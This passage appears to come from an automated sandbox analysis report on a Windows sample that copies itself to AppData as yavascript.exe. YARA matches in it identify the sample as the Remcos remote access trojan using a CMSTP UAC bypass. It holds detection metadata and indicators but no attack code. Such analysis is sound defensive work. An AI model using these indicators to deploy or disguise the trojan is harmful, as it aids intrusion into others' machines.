            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041E5DF20_2_0041E5DF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0044C73920_2_0044C739
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004267CB20_2_004267CB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043C9DD20_2_0043C9DD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00432A4920_2_00432A49
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043CC0C20_2_0043CC0C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00434D2220_2_00434D22
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00426E7320_2_00426E73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00440E2020_2_00440E20
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043CE3B20_2_0043CE3B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00412F4520_2_00412F45
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00452F0020_2_00452F00
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00426FAD20_2_00426FAD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0215721420_2_02157214
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214D2D820_2_0214D2D8
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0216D2FF20_2_0216D2FF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0218233920_2_02182339
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_021673B720_2_021673B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0217108720_2_02171087
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0216D0A220_2_0216D0A2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_021570DA20_2_021570DA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0216641120_2_02166411
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_021564BB20_2_021564BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02156A3220_2_02156A32
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214E84620_2_0214E846
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0216CE7320_2_0216CE73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0216CC4420_2_0216CC44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02162CB020_2_02162CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041D07138_2_0041D071
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004520D238_2_004520D2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043D09838_2_0043D098
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043715038_2_00437150
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004361AA38_2_004361AA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0042625438_2_00426254
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043137738_2_00431377
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041E5DF38_2_0041E5DF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0044C73938_2_0044C739
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004267CB38_2_004267CB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043C9DD38_2_0043C9DD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00432A4938_2_00432A49
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043CC0C38_2_0043CC0C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00434D2238_2_00434D22
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00426E7338_2_00426E73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00440E2038_2_00440E20
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0043CE3B38_2_0043CE3B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00412F4538_2_00412F45
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00452F0038_2_00452F00
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00426FAD38_2_00426FAD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021A721438_2_021A7214
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219D2D838_2_0219D2D8
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021BD2FF38_2_021BD2FF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021D233938_2_021D2339
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021B73B738_2_021B73B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021C108738_2_021C1087
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021BD0A238_2_021BD0A2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021A70DA38_2_021A70DA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021B641138_2_021B6411
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021A64BB38_2_021A64BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021A6A3238_2_021A6A32
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219E84638_2_0219E846
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021BCE7338_2_021BCE73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021BCC4438_2_021BCC44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021B2CB038_2_021B2CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 0075234E appears 37 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 021B3B0C appears 41 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 02164217 appears 46 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 02163B0C appears 41 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 0043ADAE appears 45 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 021B4217 appears 46 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 0218234E appears 37 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00401D64 appears 64 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00447174 appears 54 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00401F66 appears 150 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00401FAA appears 63 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00403B40 appears 66 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00433FB0 appears 165 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00406478 appears 33 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00444B14 appears 84 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00404C9E appears 48 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 004026CE appears 45 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 004020E7 appears 118 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 004567E0 appears 39 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00401E8F appears 55 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00401E52 appears 33 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 004040BB appears 54 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00410D8D appears 54 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 004338A5 appears 123 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00783B0C appears 41 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 0213234E appears 37 times
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: String function: 00784217 appears 46 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 004020E7 appears 39 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 020F234E appears 37 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 02124217 appears 46 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 00401F66 appears 50 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 004338A5 appears 41 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 02123B0C appears 41 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: String function: 00433FB0 appears 55 times
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000
            Source: yPIOW6yoPi.exe, 00000000.00000003.2152739528.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesDefence0 vs yPIOW6yoPi.exe
            Source: yPIOW6yoPi.exe, 00000000.00000000.2143194743.0000000000463000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesDefence0 vs yPIOW6yoPi.exe
            Source: yPIOW6yoPi.exeBinary or memory string: OriginalFilenamesDefence0 vs yPIOW6yoPi.exe
            Source: yPIOW6yoPi.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
